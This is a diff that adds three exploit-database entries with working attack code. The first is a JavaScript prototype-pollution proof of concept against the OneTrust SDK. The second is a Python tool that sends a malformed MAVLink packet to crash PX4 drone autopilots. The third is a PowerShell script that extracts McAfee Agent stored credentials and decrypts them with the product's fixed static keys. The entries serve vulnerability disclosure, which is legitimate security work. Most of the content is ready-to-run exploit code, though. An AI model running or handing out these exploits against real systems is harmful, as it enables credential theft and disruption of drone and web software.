CERTCC
diff --git a/‎exploits/linux/remote/52340.txt‎
Lines changed: 84 additions & 0 deletions b/‎exploits/linux/remote/52340.txt‎
Lines changed: 84 additions & 0 deletions
diff --git a/‎exploits/multiple/remote/52339.py‎
Lines changed: 97 additions & 0 deletions b/‎exploits/multiple/remote/52339.py‎
Lines changed: 97 additions & 0 deletions
diff --git a/‎exploits/multiple/remote/52345.txt‎
Lines changed: 182 additions & 0 deletions b/‎exploits/multiple/remote/52345.txt‎
Lines changed: 182 additions & 0 deletions
@@ -0,0 +1,84 @@
+- **Exploit Title**: OneTrust SDK 6.33.0 - Denial Of Service (DoS)
+- **Date**: 01/01/2025
+- **Exploit Author**: Alameen Karim Merali
+- **Vendor Homepage**: [OneTrust JavaScript API](https://developer.onetrust.com/onetrust/docs/javascript-api)
+- **Software Link**: [otBannerSdk.js v6.33.0](https://discord.com/assets/oneTrust/v4/scripttemplates/6.33.0/otBannerSdk.js)
+- **Version**: 6.33.0
+- **Tested on**: Kali Linux
+- **CVE ID**: CVE-2024-57708
+
+## Vulnerability Summary
+
+A vulnerability exists in **OneTrust SDK v6.33.0** that allows an attacker to perform **Prototype Pollution** via the misuse of `Object.setPrototypeOf` and `Object.assign`. An attacker can inject malicious properties into the prototype chain, potentially causing **Denial of Service (DoS)** or altering the behavior of inherited objects throughout the application.
+
+## Technical Details
+
+The affected code includes prototype assignment logic such as:
+
+```javascript
+var o = function(e, t) {
+  return (o = Object.setPrototypeOf || { __proto__: [] } instanceof ...);
+};
+```
+
+If the `t` argument (a user-supplied object) contains a `__proto__` or `constructor.prototype` reference, it can pollute `Object.prototype` globally.
+
+## Proof-of-Concept (PoC)
+
+```javascript
+function testPrototypePollution() {
+  const maliciousPayload = {
+    "__proto__": {
+      polluted: "yes"
+    }
+  };
+
+  // Using vulnerable function 'o'
+  try {
+    o({}, maliciousPayload);
+    console.log("After o:", {}.polluted); // "yes"
+  } catch (e) {
+    console.error("Error testing o:", e);
+  }
+
+  // Using Object.assign
+  try {
+    Object.assign({}, maliciousPayload);
+    console.log("After Object.assign:", {}.polluted); // "yes"
+  } catch (e) {
+    console.error("Error testing Object.assign:", e);
+  }
+
+  // Cleanup
+  delete Object.prototype.polluted;
+}
+testPrototypePollution();
+```
+
+## Browser Console PoC (DevTools)
+
+```javascript
+var maliciousObj = { __proto__: { hacked: true } };
+var newObj = Object.create(maliciousObj);
+console.log(newObj.hacked); // true
+```
+
+Screenshot: [PoC Screenshot](https://ibb.co/B2hyYr5v)
+
+## Steps to Reproduce
+
+1. Save the PoC script above as `exploit.js`
+2. Run using Node.js: `node exploit.js`
+3. Observe polluted output (`{}.polluted === "yes"`)
+4. Alternatively, run the payload in browser DevTools
+
+## Impact
+
+- Global object pollution
+- Application logic errors
+- Potential DoS
+- Further exploitation depending on context
+
+## Recommendation
+
+Developers should upgrade to a patched version and sanitize any user input used in object merging or prototype manipulation.
@@ -0,0 +1,97 @@
+# Exploit Title: PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)
+# Author: Mohammed Idrees Banyamer (@banyamer_security)
+# GitHub: https://github.com/mbanyamer
+# Date: 2025-06-21
+# Tested on: Ubuntu 20.04 LTS + PX4 SITL (jMAVSim)
+# CVE: CVE-2025-5640
+# Type: Denial of Service (DoS) via Buffer Overflow
+# Platform: Cross-platform (Military UAVs / PX4 SITL / Linux-based autopilot ground station)
+# Author Country: Jordan
+# Description:
+#   A stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot <=1.12.3 is triggered
+#   when handling a malformed MAVLink message of type TRAJECTORY_REPRESENTATION_WAYPOINTS.
+#   An attacker with access to the MAVLink communication channel can send a crafted packet
+#   to crash the autopilot, potentially disrupting military UAV operations. This exploit demonstrates
+#   a proof-of-concept that causes the PX4 autopilot to crash via UDP.
+
+
+import argparse
+import binascii
+from pymavlink import mavutil
+import sys
+
+# Exploit payload (malformed MAVLink hex)
+hex_payload = (
+    "fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352"
+    "c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b78"
+    "12731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6"
+)
+
+def connect_to_px4(ip, port, timeout, verbose=False):
+    try:
+        if verbose:
+            print(f"[*] Connecting to PX4 at udp:{ip}:{port} ...")
+        master = mavutil.mavlink_connection(f"udp:{ip}:{port}")
+        master.wait_heartbeat(timeout=timeout)
+        if verbose:
+            print("[+] PX4 heartbeat received. Connection OK.")
+        return master
+    except Exception as e:
+        print(f"[!] Error connecting to PX4: {e}")
+        sys.exit(1)
+
+def send_dos_packet(master, verbose=False):
+    try:
+        payload = binascii.unhexlify(hex_payload)
+        master.write(payload)
+        print("[+] Exploit packet sent. Monitor PX4 for crash.")
+    except Exception as e:
+        print(f"[!] Failed to send payload: {e}")
+        sys.exit(1)
+
+def main():
+    usage = """
+    PX4 Exploit Tool - CVE-2025-5640
+    =================================
+    Exploit a buffer overflow vulnerability in PX4 autopilot via MAVLink.
+
+    USAGE:
+        python3 px4_exploit_tool.py [OPTIONS]
+
+    EXAMPLES:
+        # Run DoS attack on default PX4 SITL
+        python3 px4_exploit_tool.py --mode dos
+
+        # Test connectivity to a real drone
+        python3 px4_exploit_tool.py --mode check --ip 192.168.10.10 --port 14550
+
+    OPTIONS:
+        --ip        Target IP address (default: 127.0.0.1)
+        --port      Target UDP port (default: 14540)
+        --mode      Mode of operation: dos (default), check
+        --timeout   Timeout in seconds for heartbeat (default: 5)
+        --verbose   Enable verbose output
+    """
+    parser = argparse.ArgumentParser(
+        description="PX4 MAVLink DoS Exploit Tool (CVE-2025-5640) by @banyamer_security",
+        epilog=usage,
+        formatter_class=argparse.RawDescriptionHelpFormatter
+    )
+    parser.add_argument("--ip", default="127.0.0.1", help="Target IP address (default: 127.0.0.1)")
+    parser.add_argument("--port", type=int, default=14540, help="Target UDP port (default: 14540)")
+    parser.add_argument("--timeout", type=int, default=5, help="Timeout in seconds for heartbeat (default: 5)")
+    parser.add_argument("--mode", choices=["dos", "check"], default="dos", help="Mode: dos (default) or check connection")
+    parser.add_argument("--verbose", action="store_true", help="Enable verbose output")
+
+    args = parser.parse_args()
+
+    master = connect_to_px4(args.ip, args.port, args.timeout, args.verbose)
+
+    if args.mode == "check":
+        print("[*] PX4 is alive. Connection test passed.")
+    elif args.mode == "dos":
+        send_dos_packet(master, args.verbose)
+
+
+if __name__ == "__main__":
+    main()
@@ -0,0 +1,182 @@
+Exploit Title: McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information
+Date: 24 June 2025
+Exploit Author: Keenan Scott
+Vendor Homepage: hxxps[://]www[.]mcafee[.]com/
+Software Download: N/A (Unable to find)
+Version: < 5.7.6
+Tested on: Windows 11
+CVE: CVE-2022-1257
+
+<#
+.SYNOPSIS
+    Dump and decrypt encrypted Windows credentials from Trellix Agent Database ("C:\ProgramData\McAfee\Agent\DB\ma.db") - PoC for CVE-2022-1257. Made by scottk817
+
+.DESCRIPTION
+    This script demonstrates exploitation of CVE-2022-1257, a vulnerability in McAfee's Trellix Agent Database where attackers can retrieve and decrypt credentials from the `ma.db` database file.
+
+.LINK
+    https://nvd.nist.gov/vuln/detail/cve-2022-1257
+    https://github.com/funoverip/mcafee-sitelist-pwd-decryption/blob/master/mcafee_sitelist_pwd_decrypt.py
+    https://mrd0x.com/abusing-mcafee-vulnerabilities-misconfigurations/
+    https://tryhackme.com/room/breachingad
+
+.OUTPUTS
+    CSV in stdOut:
+        Username,Password
+#>
+
+
+
+# Arguments
+[CmdletBinding()]
+param (
+    [string]$DbSource = 'C:\ProgramData\McAfee\Agent\DB\ma.db',
+    [string]$TempFolder = $env:TEMP
+)
+
+
+
+### Initialize use of WinSQLite3 ###
+$cls = "WinSQLite_{0}" -f ([guid]::NewGuid().ToString('N'))
+
+$code = @"
+using System;
+using System.Runtime.InteropServices;
+
+public static class $cls
+{
+    public const int SQLITE_OK  = 0;
+    public const int SQLITE_ROW = 100;
+
+    [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
+    public static extern int sqlite3_open_v2(
+        [MarshalAs(UnmanagedType.LPStr)] string filename,
+        out IntPtr db,
+        int flags,
+        IntPtr vfs
+    );
+
+    [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
+    public static extern int sqlite3_close(IntPtr db);
+
+    [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
+    public static extern int sqlite3_prepare_v2(
+        IntPtr db, string sql, int nByte,
+        out IntPtr stmt, IntPtr pzTail
+    );
+
+    [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
+    public static extern int sqlite3_step(IntPtr stmt);
+
+    [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
+    public static extern IntPtr sqlite3_column_text(IntPtr stmt, int col);
+
+    [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
+    public static extern int sqlite3_finalize(IntPtr stmt);
+}
+"@
+
+# SQL statement to retrieve usersnames and encrypted passwords from ma.db
+$sql = @"
+SELECT AUTH_USER, AUTH_PASSWD
+FROM AGENT_REPOSITORIES
+WHERE AUTH_PASSWD IS NOT NULL;
+"@
+
+Add-Type -TypeDefinition $code -PassThru | Out-Null
+$type = [type]$cls
+
+
+
+### Decode and Decrypt ###
+# Function to decode, and decrypt the credentials found in the DB using the static keys used for every Trellix agent.
+function Invoke-McAfeeDecrypt {
+    param([string]$B64)
+
+    [byte[]]$mask = 0x12,0x15,0x0F,0x10,0x11,0x1C,0x1A,0x06,
+                    0x0A,0x1F,0x1B,0x18,0x17,0x16,0x05,0x19
+    [byte[]]$buf = [Convert]::FromBase64String($B64.Trim())
+    for ($i = 0; $i -lt $buf.Length; $i++) {
+        $buf[$i] = $buf[$i] -bxor $mask[$i % $mask.Length]
+    }
+
+    $sha = [System.Security.Cryptography.SHA1]::Create()
+    [byte[]]$key = $sha.ComputeHash([Text.Encoding]::ASCII.GetBytes("<!@#$%^>")) + (0..3 | ForEach-Object { 0 })
+
+    $tdes = [System.Security.Cryptography.TripleDES]::Create()
+    $tdes.Mode = 'ECB'
+    $tdes.Padding = 'None'
+    $tdes.Key = $key
+    [byte[]]$plain = $tdes.CreateDecryptor().TransformFinalBlock($buf, 0, $buf.Length)
+
+    $i = 0
+    while ($i -lt $plain.Length -and $plain[$i] -ge 0x20 -and $plain[$i] -le 0x7E) {
+        $i++
+    }
+    if ($i -eq 0) { return '' }
+    [Text.Encoding]::UTF8.GetString($plain, 0, $i)
+}
+
+
+### Copy ma.db ###
+# Copy ma.db over to temp directory add GUID incase it already exists there.
+$tmp = Join-Path $TempFolder ("ma_{0}.db" -f ([guid]::NewGuid()))
+Copy-Item -LiteralPath $DbSource -Destination $tmp -Force
+
+### Pull records ###
+$dbPtr = [IntPtr]::Zero
+$stmtPtr = [IntPtr]::Zero
+$flags = 1
+$rc = $type::sqlite3_open_v2($tmp, [ref]$dbPtr, $flags, [IntPtr]::Zero)
+
+if ($rc -ne $type::SQLITE_OK) {
+    $msg = [Runtime.InteropServices.Marshal]::PtrToStringAnsi(
+        $type::sqlite3_errmsg($dbPtr))
+    Throw "sqlite3_open_v2 failed (code $rc) : $msg"
+}
+
+$rc = $type::sqlite3_prepare_v2($dbPtr, $sql, -1, [ref]$stmtPtr, [IntPtr]::Zero)
+
+if ($rc -ne $type::SQLITE_OK) {
+    $msg = [Runtime.InteropServices.Marshal]::PtrToStringAnsi(
+        $type::sqlite3_errmsg($dbPtr))
+    $type::sqlite3_close($dbPtr) | Out-Null
+    Throw "sqlite3_prepare_v2 failed (code $rc) : $msg"
+}
+
+$buffer = [System.Collections.Generic.List[string]]::new()
+while ($type::sqlite3_step($stmtPtr) -eq $type::SQLITE_ROW) {
+    $uPtr = $type::sqlite3_column_text($stmtPtr, 0)
+    $pPtr = $type::sqlite3_column_text($stmtPtr, 1)
+
+    $user = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($uPtr)
+    $pass = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($pPtr)
+
+    if ($user -and $pass) {
+        $buffer.Add("$user,$pass")
+    }
+}
+
+### Cleanup ###
+# Finish and close SQL
+$type::sqlite3_finalize($stmtPtr) | Out-Null
+$type::sqlite3_close($dbPtr) | Out-Null
+
+# Delete the ma.db file copied to the temp file
+Remove-Item $tmp -Force -ErrorAction SilentlyContinue
+
+### Process encrypted credentials ###
+# For each row of credentials decrypt them and print plaintext to standard out.
+foreach ($line in $buffer) {
+    $rec = $line -split ',', 2
+    if ($rec.Length -eq 2) {
+        $username = $rec[0]
+        try {
+            $password = Invoke-McAfeeDecrypt $rec[1]
+        } catch {
+            $password = "[DECRYPT-ERROR] $_"
+        }
+        "Username,Password"
+        "$username,$password"
+    }
+}